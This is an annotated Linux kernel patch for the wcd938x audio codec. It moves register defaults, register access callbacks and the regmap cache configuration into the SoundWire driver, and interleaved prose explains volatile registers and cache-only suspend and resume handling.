++	case WCD938X_DIGITAL_INTR_STATUS_2:
++	case WCD938X_DIGITAL_INTR_CLEAR_0:
++	case WCD938X_DIGITAL_INTR_CLEAR_1:
++	case WCD938X_DIGITAL_INTR_CLEAR_2:
++	case WCD938X_DIGITAL_SWR_HM_TEST_0:
++	case WCD938X_DIGITAL_SWR_HM_TEST_1:
++	case WCD938X_DIGITAL_EFUSE_T_DATA_0:
++	case WCD938X_DIGITAL_EFUSE_T_DATA_1:
++	case WCD938X_DIGITAL_PIN_STATUS_0:
++	case WCD938X_DIGITAL_PIN_STATUS_1:
++	case WCD938X_DIGITAL_MODE_STATUS_0:
++	case WCD938X_DIGITAL_MODE_STATUS_1:
++	case WCD938X_DIGITAL_EFUSE_REG_0:
++	case WCD938X_DIGITAL_EFUSE_REG_1:
++	case WCD938X_DIGITAL_EFUSE_REG_2:
++	case WCD938X_DIGITAL_EFUSE_REG_3:
++	case WCD938X_DIGITAL_EFUSE_REG_4:
++	case WCD938X_DIGITAL_EFUSE_REG_5:
++	case WCD938X_DIGITAL_EFUSE_REG_6:
++	case WCD938X_DIGITAL_EFUSE_REG_7:
++	case WCD938X_DIGITAL_EFUSE_REG_8:
++	case WCD938X_DIGITAL_EFUSE_REG_9:
++	case WCD938X_DIGITAL_EFUSE_REG_10:
++	case WCD938X_DIGITAL_EFUSE_REG_11:
++	case WCD938X_DIGITAL_EFUSE_REG_12:
++	case WCD938X_DIGITAL_EFUSE_REG_13:
++	case WCD938X_DIGITAL_EFUSE_REG_14:
++	case WCD938X_DIGITAL_EFUSE_REG_15:
++	case WCD938X_DIGITAL_EFUSE_REG_16:
++	case WCD938X_DIGITAL_EFUSE_REG_17:
++	case WCD938X_DIGITAL_EFUSE_REG_18:
++	case WCD938X_DIGITAL_EFUSE_REG_19:
++	case WCD938X_DIGITAL_EFUSE_REG_20:
++	case WCD938X_DIGITAL_EFUSE_REG_21:
++	case WCD938X_DIGITAL_EFUSE_REG_22:
++	case WCD938X_DIGITAL_EFUSE_REG_23:
++	case WCD938X_DIGITAL_EFUSE_REG_24:
++	case WCD938X_DIGITAL_EFUSE_REG_25:
++	case WCD938X_DIGITAL_EFUSE_REG_26:
++	case WCD938X_DIGITAL_EFUSE_REG_27:
++	case WCD938X_DIGITAL_EFUSE_REG_28:
++	case WCD938X_DIGITAL_EFUSE_REG_29:
++	case WCD938X_DIGITAL_EFUSE_REG_30:
++	case WCD938X_DIGITAL_EFUSE_REG_31:
++		return true;
++	}
++	return false;
++}
++
++static bool wcd938x_readable_register(struct device *dev, unsigned int reg)
++{
++	bool ret;
++
++	ret = wcd938x_readonly_register(dev, reg);
++	if (!ret)
++		return wcd938x_rdwr_register(dev, reg);
++
++	return ret;
++}
++
++static bool wcd938x_writeable_register(struct device *dev, unsigned int reg)
++{
++	return wcd938x_rdwr_register(dev, reg);
++}
++
++static bool wcd938x_volatile_register(struct device *dev, unsigned int reg)
++{
++	if (reg <= WCD938X_BASE_ADDRESS)
++		return false;
++
++	if (reg == WCD938X_DIGITAL_SWR_TX_CLK_RATE)
++		return true;
++
++	if (wcd938x_readonly_register(dev, reg))
++		return true;
++
++	return false;
++}
++
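Marking the status, eFuse and SoundWire TX clock-rate registers volatile keeps
them out of the register cache, so a read always goes to the device, while
reads of cached non-volatile registers can be served locally. A minimal sketch
of the resulting behaviour, assuming a regmap built with the config below:

	unsigned int val;

	/* volatile: bypasses the cache, always hits the bus */
	regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_0, &val);

	/* non-volatile: may be answered from the regcache */
	regmap_read(wcd->regmap, WCD938X_DIGITAL_CDC_RX0_CTL, &val);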
++static const struct regmap_config wcd938x_regmap_config = {
++	.name = "wcd938x_csr",
++	.reg_bits = 32,
++	.val_bits = 8,
++	.cache_type = REGCACHE_RBTREE,
++	.reg_defaults = wcd938x_defaults,
++	.num_reg_defaults = ARRAY_SIZE(wcd938x_defaults),
++	.max_register = WCD938X_MAX_REGISTER,
++	.readable_reg = wcd938x_readable_register,
++	.writeable_reg = wcd938x_writeable_register,
++	.volatile_reg = wcd938x_volatile_register,
++	.can_multi_write = true,
++};
++
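The REGCACHE_RBTREE cache configured above is what makes the cache-only
toggling in the probe and runtime-PM paths below cheap: while the SoundWire
link is down, writes only update the cache, and regcache_sync() later replays
the dirty non-volatile registers to the device. A minimal sketch of that
lifecycle, assuming a regmap created with this config:

	/* link going down: stop touching hardware, note state may go stale */
	regcache_cache_only(map, true);
	regcache_mark_dirty(map);

	/* ... regmap_write() calls here land in the cache only ... */

	/* link back up: replay dirty, non-volatile registers */
	regcache_cache_only(map, false);
	regcache_sync(map);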
++static const struct sdw_slave_ops wcd9380_slave_ops = {
+ 	.update_status = wcd9380_update_status,
+ 	.interrupt_callback = wcd9380_interrupt_callback,
+ 	.bus_config = wcd9380_bus_config,
+@@ -261,6 +1263,16 @@ static int wcd9380_probe(struct sdw_slave *pdev,
+ 		wcd->ch_info = &wcd938x_sdw_rx_ch_info[0];
+ 	}
+ 
++	if (wcd->is_tx) {
++		wcd->regmap = devm_regmap_init_sdw(pdev, &wcd938x_regmap_config);
++		if (IS_ERR(wcd->regmap))
++			return dev_err_probe(dev, PTR_ERR(wcd->regmap),
++					     "Regmap init failed\n");
++
++		/* Start in cache-only until device is enumerated */
++		regcache_cache_only(wcd->regmap, true);
++	}
++
+ 	pm_runtime_set_autosuspend_delay(dev, 3000);
+ 	pm_runtime_use_autosuspend(dev);
+ 	pm_runtime_mark_last_busy(dev);
+@@ -278,22 +1290,23 @@ MODULE_DEVICE_TABLE(sdw, wcd9380_slave_id);
+ 
+ static int __maybe_unused wcd938x_sdw_runtime_suspend(struct device *dev)
+ {
+-	struct regmap *regmap = dev_get_regmap(dev, NULL);
++	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(dev);
+ 
+-	if (regmap) {
+-		regcache_cache_only(regmap, true);
+-		regcache_mark_dirty(regmap);
++	if (wcd->regmap) {
++		regcache_cache_only(wcd->regmap, true);
++		regcache_mark_dirty(wcd->regmap);
+ 	}
++
+ 	return 0;
+ }
+ 
+ static int __maybe_unused wcd938x_sdw_runtime_resume(struct device *dev)
+ {
+-	struct regmap *regmap = dev_get_regmap(dev, NULL);
++	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(dev);
+ 
+-	if (regmap) {
+-		regcache_cache_only(regmap, false);
+-		regcache_sync(regmap);
++	if (wcd->regmap) {
++		regcache_cache_only(wcd->regmap, false);
++		regcache_sync(wcd->regmap);
+ 	}
+ 
+ 	pm_runtime_mark_last_busy(dev);
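The reworked suspend/resume handlers above reach the regmap through the
driver's private data rather than dev_get_regmap(), which assumes the probe
path published that pointer; a minimal sketch of the pairing, using the names
this driver already defines:

	/* in probe, after devm_regmap_init_sdw() */
	dev_set_drvdata(dev, wcd);

	/* in the PM callbacks */
	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(dev);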
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index fcac763b04d1b..d34f13758aca0 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -273,1001 +273,6 @@ static struct wcd_mbhc_field wcd_mbhc_fields[WCD_MBHC_REG_FUNC_MAX] = {
+ 	WCD_MBHC_FIELD(WCD_MBHC_ELECT_ISRC_EN, WCD938X_ANA_MBHC_ZDET, 0x02),
+ };
+ 
+-static const struct reg_default wcd938x_defaults[] = {
+-	{WCD938X_ANA_PAGE_REGISTER,                            0x00},
+-	{WCD938X_ANA_BIAS,                                     0x00},
+-	{WCD938X_ANA_RX_SUPPLIES,                              0x00},
+-	{WCD938X_ANA_HPH,                                      0x0C},
+-	{WCD938X_ANA_EAR,                                      0x00},
+-	{WCD938X_ANA_EAR_COMPANDER_CTL,                        0x02},
+-	{WCD938X_ANA_TX_CH1,                                   0x20},
+-	{WCD938X_ANA_TX_CH2,                                   0x00},
+-	{WCD938X_ANA_TX_CH3,                                   0x20},
+-	{WCD938X_ANA_TX_CH4,                                   0x00},
+-	{WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC,                 0x00},
+-	{WCD938X_ANA_MICB3_DSP_EN_LOGIC,                       0x00},
+-	{WCD938X_ANA_MBHC_MECH,                                0x39},
+-	{WCD938X_ANA_MBHC_ELECT,                               0x08},
+-	{WCD938X_ANA_MBHC_ZDET,                                0x00},
+-	{WCD938X_ANA_MBHC_RESULT_1,                            0x00},
+-	{WCD938X_ANA_MBHC_RESULT_2,                            0x00},
+-	{WCD938X_ANA_MBHC_RESULT_3,                            0x00},
+-	{WCD938X_ANA_MBHC_BTN0,                                0x00},
+-	{WCD938X_ANA_MBHC_BTN1,                                0x10},
+-	{WCD938X_ANA_MBHC_BTN2,                                0x20},
+-	{WCD938X_ANA_MBHC_BTN3,                                0x30},
+-	{WCD938X_ANA_MBHC_BTN4,                                0x40},
+-	{WCD938X_ANA_MBHC_BTN5,                                0x50},
+-	{WCD938X_ANA_MBHC_BTN6,                                0x60},
+-	{WCD938X_ANA_MBHC_BTN7,                                0x70},
+-	{WCD938X_ANA_MICB1,                                    0x10},
+-	{WCD938X_ANA_MICB2,                                    0x10},
+-	{WCD938X_ANA_MICB2_RAMP,                               0x00},
+-	{WCD938X_ANA_MICB3,                                    0x10},
+-	{WCD938X_ANA_MICB4,                                    0x10},
+-	{WCD938X_BIAS_CTL,                                     0x2A},
+-	{WCD938X_BIAS_VBG_FINE_ADJ,                            0x55},
+-	{WCD938X_LDOL_VDDCX_ADJUST,                            0x01},
+-	{WCD938X_LDOL_DISABLE_LDOL,                            0x00},
+-	{WCD938X_MBHC_CTL_CLK,                                 0x00},
+-	{WCD938X_MBHC_CTL_ANA,                                 0x00},
+-	{WCD938X_MBHC_CTL_SPARE_1,                             0x00},
+-	{WCD938X_MBHC_CTL_SPARE_2,                             0x00},
+-	{WCD938X_MBHC_CTL_BCS,                                 0x00},
+-	{WCD938X_MBHC_MOISTURE_DET_FSM_STATUS,                 0x00},
+-	{WCD938X_MBHC_TEST_CTL,                                0x00},
+-	{WCD938X_LDOH_MODE,                                    0x2B},
+-	{WCD938X_LDOH_BIAS,                                    0x68},
+-	{WCD938X_LDOH_STB_LOADS,                               0x00},
+-	{WCD938X_LDOH_SLOWRAMP,                                0x50},
+-	{WCD938X_MICB1_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB1_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB1_TEST_CTL_3,                             0xA4},
+-	{WCD938X_MICB2_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB2_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB2_TEST_CTL_3,                             0x24},
+-	{WCD938X_MICB3_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB3_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB3_TEST_CTL_3,                             0xA4},
+-	{WCD938X_MICB4_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB4_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB4_TEST_CTL_3,                             0xA4},
+-	{WCD938X_TX_COM_ADC_VCM,                               0x39},
+-	{WCD938X_TX_COM_BIAS_ATEST,                            0xE0},
+-	{WCD938X_TX_COM_SPARE1,                                0x00},
+-	{WCD938X_TX_COM_SPARE2,                                0x00},
+-	{WCD938X_TX_COM_TXFE_DIV_CTL,                          0x22},
+-	{WCD938X_TX_COM_TXFE_DIV_START,                        0x00},
+-	{WCD938X_TX_COM_SPARE3,                                0x00},
+-	{WCD938X_TX_COM_SPARE4,                                0x00},
+-	{WCD938X_TX_1_2_TEST_EN,                               0xCC},
+-	{WCD938X_TX_1_2_ADC_IB,                                0xE9},
+-	{WCD938X_TX_1_2_ATEST_REFCTL,                          0x0A},
+-	{WCD938X_TX_1_2_TEST_CTL,                              0x38},
+-	{WCD938X_TX_1_2_TEST_BLK_EN1,                          0xFF},
+-	{WCD938X_TX_1_2_TXFE1_CLKDIV,                          0x00},
+-	{WCD938X_TX_1_2_SAR2_ERR,                              0x00},
+-	{WCD938X_TX_1_2_SAR1_ERR,                              0x00},
+-	{WCD938X_TX_3_4_TEST_EN,                               0xCC},
+-	{WCD938X_TX_3_4_ADC_IB,                                0xE9},
+-	{WCD938X_TX_3_4_ATEST_REFCTL,                          0x0A},
+-	{WCD938X_TX_3_4_TEST_CTL,                              0x38},
+-	{WCD938X_TX_3_4_TEST_BLK_EN3,                          0xFF},
+-	{WCD938X_TX_3_4_TXFE3_CLKDIV,                          0x00},
+-	{WCD938X_TX_3_4_SAR4_ERR,                              0x00},
+-	{WCD938X_TX_3_4_SAR3_ERR,                              0x00},
+-	{WCD938X_TX_3_4_TEST_BLK_EN2,                          0xFB},
+-	{WCD938X_TX_3_4_TXFE2_CLKDIV,                          0x00},
+-	{WCD938X_TX_3_4_SPARE1,                                0x00},
+-	{WCD938X_TX_3_4_TEST_BLK_EN4,                          0xFB},
+-	{WCD938X_TX_3_4_TXFE4_CLKDIV,                          0x00},
+-	{WCD938X_TX_3_4_SPARE2,                                0x00},
+-	{WCD938X_CLASSH_MODE_1,                                0x40},
+-	{WCD938X_CLASSH_MODE_2,                                0x3A},
+-	{WCD938X_CLASSH_MODE_3,                                0x00},
+-	{WCD938X_CLASSH_CTRL_VCL_1,                            0x70},
+-	{WCD938X_CLASSH_CTRL_VCL_2,                            0x82},
+-	{WCD938X_CLASSH_CTRL_CCL_1,                            0x31},
+-	{WCD938X_CLASSH_CTRL_CCL_2,                            0x80},
+-	{WCD938X_CLASSH_CTRL_CCL_3,                            0x80},
+-	{WCD938X_CLASSH_CTRL_CCL_4,                            0x51},
+-	{WCD938X_CLASSH_CTRL_CCL_5,                            0x00},
+-	{WCD938X_CLASSH_BUCK_TMUX_A_D,                         0x00},
+-	{WCD938X_CLASSH_BUCK_SW_DRV_CNTL,                      0x77},
+-	{WCD938X_CLASSH_SPARE,                                 0x00},
+-	{WCD938X_FLYBACK_EN,                                   0x4E},
+-	{WCD938X_FLYBACK_VNEG_CTRL_1,                          0x0B},
+-	{WCD938X_FLYBACK_VNEG_CTRL_2,                          0x45},
+-	{WCD938X_FLYBACK_VNEG_CTRL_3,                          0x74},
+-	{WCD938X_FLYBACK_VNEG_CTRL_4,                          0x7F},
+-	{WCD938X_FLYBACK_VNEG_CTRL_5,                          0x83},
+-	{WCD938X_FLYBACK_VNEG_CTRL_6,                          0x98},
+-	{WCD938X_FLYBACK_VNEG_CTRL_7,                          0xA9},
+-	{WCD938X_FLYBACK_VNEG_CTRL_8,                          0x68},
+-	{WCD938X_FLYBACK_VNEG_CTRL_9,                          0x64},
+-	{WCD938X_FLYBACK_VNEGDAC_CTRL_1,                       0xED},
+-	{WCD938X_FLYBACK_VNEGDAC_CTRL_2,                       0xF0},
+-	{WCD938X_FLYBACK_VNEGDAC_CTRL_3,                       0xA6},
+-	{WCD938X_FLYBACK_CTRL_1,                               0x65},
+-	{WCD938X_FLYBACK_TEST_CTL,                             0x00},
+-	{WCD938X_RX_AUX_SW_CTL,                                0x00},
+-	{WCD938X_RX_PA_AUX_IN_CONN,                            0x01},
+-	{WCD938X_RX_TIMER_DIV,                                 0x32},
+-	{WCD938X_RX_OCP_CTL,                                   0x1F},
+-	{WCD938X_RX_OCP_COUNT,                                 0x77},
+-	{WCD938X_RX_BIAS_EAR_DAC,                              0xA0},
+-	{WCD938X_RX_BIAS_EAR_AMP,                              0xAA},
+-	{WCD938X_RX_BIAS_HPH_LDO,                              0xA9},
+-	{WCD938X_RX_BIAS_HPH_PA,                               0xAA},
+-	{WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2,                    0x8A},
+-	{WCD938X_RX_BIAS_HPH_RDAC_LDO,                         0x88},
+-	{WCD938X_RX_BIAS_HPH_CNP1,                             0x82},
+-	{WCD938X_RX_BIAS_HPH_LOWPOWER,                         0x82},
+-	{WCD938X_RX_BIAS_AUX_DAC,                              0xA0},
+-	{WCD938X_RX_BIAS_AUX_AMP,                              0xAA},
+-	{WCD938X_RX_BIAS_VNEGDAC_BLEEDER,                      0x50},
+-	{WCD938X_RX_BIAS_MISC,                                 0x00},
+-	{WCD938X_RX_BIAS_BUCK_RST,                             0x08},
+-	{WCD938X_RX_BIAS_BUCK_VREF_ERRAMP,                     0x44},
+-	{WCD938X_RX_BIAS_FLYB_ERRAMP,                          0x40},
+-	{WCD938X_RX_BIAS_FLYB_BUFF,                            0xAA},
+-	{WCD938X_RX_BIAS_FLYB_MID_RST,                         0x14},
+-	{WCD938X_HPH_L_STATUS,                                 0x04},
+-	{WCD938X_HPH_R_STATUS,                                 0x04},
+-	{WCD938X_HPH_CNP_EN,                                   0x80},
+-	{WCD938X_HPH_CNP_WG_CTL,                               0x9A},
+-	{WCD938X_HPH_CNP_WG_TIME,                              0x14},
+-	{WCD938X_HPH_OCP_CTL,                                  0x28},
+-	{WCD938X_HPH_AUTO_CHOP,                                0x16},
+-	{WCD938X_HPH_CHOP_CTL,                                 0x83},
+-	{WCD938X_HPH_PA_CTL1,                                  0x46},
+-	{WCD938X_HPH_PA_CTL2,                                  0x50},
+-	{WCD938X_HPH_L_EN,                                     0x80},
+-	{WCD938X_HPH_L_TEST,                                   0xE0},
+-	{WCD938X_HPH_L_ATEST,                                  0x50},
+-	{WCD938X_HPH_R_EN,                                     0x80},
+-	{WCD938X_HPH_R_TEST,                                   0xE0},
+-	{WCD938X_HPH_R_ATEST,                                  0x54},
+-	{WCD938X_HPH_RDAC_CLK_CTL1,                            0x99},
+-	{WCD938X_HPH_RDAC_CLK_CTL2,                            0x9B},
+-	{WCD938X_HPH_RDAC_LDO_CTL,                             0x33},
+-	{WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL,                     0x00},
+-	{WCD938X_HPH_REFBUFF_UHQA_CTL,                         0x68},
+-	{WCD938X_HPH_REFBUFF_LP_CTL,                           0x0E},
+-	{WCD938X_HPH_L_DAC_CTL,                                0x20},
+-	{WCD938X_HPH_R_DAC_CTL,                                0x20},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL,               0x55},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_EN,                     0x19},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1,                  0xA0},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS,                 0x00},
+-	{WCD938X_EAR_EAR_EN_REG,                               0x22},
+-	{WCD938X_EAR_EAR_PA_CON,                               0x44},
+-	{WCD938X_EAR_EAR_SP_CON,                               0xDB},
+-	{WCD938X_EAR_EAR_DAC_CON,                              0x80},
+-	{WCD938X_EAR_EAR_CNP_FSM_CON,                          0xB2},
+-	{WCD938X_EAR_TEST_CTL,                                 0x00},
+-	{WCD938X_EAR_STATUS_REG_1,                             0x00},
+-	{WCD938X_EAR_STATUS_REG_2,                             0x08},
+-	{WCD938X_ANA_NEW_PAGE_REGISTER,                        0x00},
+-	{WCD938X_HPH_NEW_ANA_HPH2,                             0x00},
+-	{WCD938X_HPH_NEW_ANA_HPH3,                             0x00},
+-	{WCD938X_SLEEP_CTL,                                    0x16},
+-	{WCD938X_SLEEP_WATCHDOG_CTL,                           0x00},
+-	{WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL,                 0x00},
+-	{WCD938X_MBHC_NEW_CTL_1,                               0x02},
+-	{WCD938X_MBHC_NEW_CTL_2,                               0x05},
+-	{WCD938X_MBHC_NEW_PLUG_DETECT_CTL,                     0xE9},
+-	{WCD938X_MBHC_NEW_ZDET_ANA_CTL,                        0x0F},
+-	{WCD938X_MBHC_NEW_ZDET_RAMP_CTL,                       0x00},
+-	{WCD938X_MBHC_NEW_FSM_STATUS,                          0x00},
+-	{WCD938X_MBHC_NEW_ADC_RESULT,                          0x00},
+-	{WCD938X_TX_NEW_AMIC_MUX_CFG,                          0x00},
+-	{WCD938X_AUX_AUXPA,                                    0x00},
+-	{WCD938X_LDORXTX_MODE,                                 0x0C},
+-	{WCD938X_LDORXTX_CONFIG,                               0x10},
+-	{WCD938X_DIE_CRACK_DIE_CRK_DET_EN,                     0x00},
+-	{WCD938X_DIE_CRACK_DIE_CRK_DET_OUT,                    0x00},
+-	{WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL,                    0x40},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L,                   0x81},
+-	{WCD938X_HPH_NEW_INT_RDAC_VREF_CTL,                    0x10},
+-	{WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL,                0x00},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R,                   0x81},
+-	{WCD938X_HPH_NEW_INT_PA_MISC1,                         0x22},
+-	{WCD938X_HPH_NEW_INT_PA_MISC2,                         0x00},
+-	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC,                     0x00},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER1,                       0xFE},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER2,                       0x02},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER3,                       0x4E},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER4,                       0x54},
+-	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC2,                    0x00},
+-	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC3,                    0x00},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW,               0x90},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW,               0x90},
+-	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI,              0x62},
+-	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP,                 0x01},
+-	{WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP,                   0x11},
+-	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL,            0x57},
+-	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL,       0x01},
+-	{WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT,                0x00},
+-	{WCD938X_MBHC_NEW_INT_SPARE_2,                         0x00},
+-	{WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON,                  0xA8},
+-	{WCD938X_EAR_INT_NEW_CNP_VCM_CON1,                     0x42},
+-	{WCD938X_EAR_INT_NEW_CNP_VCM_CON2,                     0x22},
+-	{WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS,                 0x00},
+-	{WCD938X_AUX_INT_EN_REG,                               0x00},
+-	{WCD938X_AUX_INT_PA_CTRL,                              0x06},
+-	{WCD938X_AUX_INT_SP_CTRL,                              0xD2},
+-	{WCD938X_AUX_INT_DAC_CTRL,                             0x80},
+-	{WCD938X_AUX_INT_CLK_CTRL,                             0x50},
+-	{WCD938X_AUX_INT_TEST_CTRL,                            0x00},
+-	{WCD938X_AUX_INT_STATUS_REG,                           0x00},
+-	{WCD938X_AUX_INT_MISC,                                 0x00},
+-	{WCD938X_LDORXTX_INT_BIAS,                             0x6E},
+-	{WCD938X_LDORXTX_INT_STB_LOADS_DTEST,                  0x50},
+-	{WCD938X_LDORXTX_INT_TEST0,                            0x1C},
+-	{WCD938X_LDORXTX_INT_STARTUP_TIMER,                    0xFF},
+-	{WCD938X_LDORXTX_INT_TEST1,                            0x1F},
+-	{WCD938X_LDORXTX_INT_STATUS,                           0x00},
+-	{WCD938X_SLEEP_INT_WATCHDOG_CTL_1,                     0x0A},
+-	{WCD938X_SLEEP_INT_WATCHDOG_CTL_2,                     0x0A},
+-	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1,               0x02},
+-	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2,               0x60},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2,               0xFF},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1,               0x7F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0,               0x3F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M,          0x1F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M,          0x0F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1,          0xD7},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0,            0xC8},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP,           0xC6},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1,      0xD5},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0,        0xCA},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP,       0x05},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0,    0xA5},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP,       0x13},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1,             0x88},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP,            0x42},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L2,                  0xFF},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L1,                  0x64},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L0,                  0x64},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP,                 0x77},
+-	{WCD938X_DIGITAL_PAGE_REGISTER,                        0x00},
+-	{WCD938X_DIGITAL_CHIP_ID0,                             0x00},
+-	{WCD938X_DIGITAL_CHIP_ID1,                             0x00},
+-	{WCD938X_DIGITAL_CHIP_ID2,                             0x0D},
+-	{WCD938X_DIGITAL_CHIP_ID3,                             0x01},
+-	{WCD938X_DIGITAL_SWR_TX_CLK_RATE,                      0x00},
+-	{WCD938X_DIGITAL_CDC_RST_CTL,                          0x03},
+-	{WCD938X_DIGITAL_TOP_CLK_CFG,                          0x00},
+-	{WCD938X_DIGITAL_CDC_ANA_CLK_CTL,                      0x00},
+-	{WCD938X_DIGITAL_CDC_DIG_CLK_CTL,                      0xF0},
+-	{WCD938X_DIGITAL_SWR_RST_EN,                           0x00},
+-	{WCD938X_DIGITAL_CDC_PATH_MODE,                        0x55},
+-	{WCD938X_DIGITAL_CDC_RX_RST,                           0x00},
+-	{WCD938X_DIGITAL_CDC_RX0_CTL,                          0xFC},
+-	{WCD938X_DIGITAL_CDC_RX1_CTL,                          0xFC},
+-	{WCD938X_DIGITAL_CDC_RX2_CTL,                          0xFC},
+-	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1,                  0x00},
+-	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3,                  0x00},
+-	{WCD938X_DIGITAL_CDC_COMP_CTL_0,                       0x00},
+-	{WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL,                   0x1E},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_0,                     0x00},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_1,                     0x01},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_0,                     0x63},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_1,                     0x04},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_0,                     0xAC},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_1,                     0x04},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_0,                     0x1A},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_1,                     0x03},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_0,                     0xBC},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_1,                     0x02},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A6_0,                     0xC7},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A7_0,                     0xF8},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_0,                      0x47},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_1,                      0x43},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_2,                      0xB1},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_3,                      0x17},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R1,                       0x4D},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R2,                       0x29},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R3,                       0x34},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R4,                       0x59},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R5,                       0x66},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R6,                       0x87},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R7,                       0x64},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_0,                     0x00},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_1,                     0x01},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_0,                     0x96},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_1,                     0x09},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_0,                     0xAB},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_1,                     0x05},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_0,                     0x1C},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_1,                     0x02},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_0,                     0x17},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_1,                     0x02},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A6_0,                     0xAA},
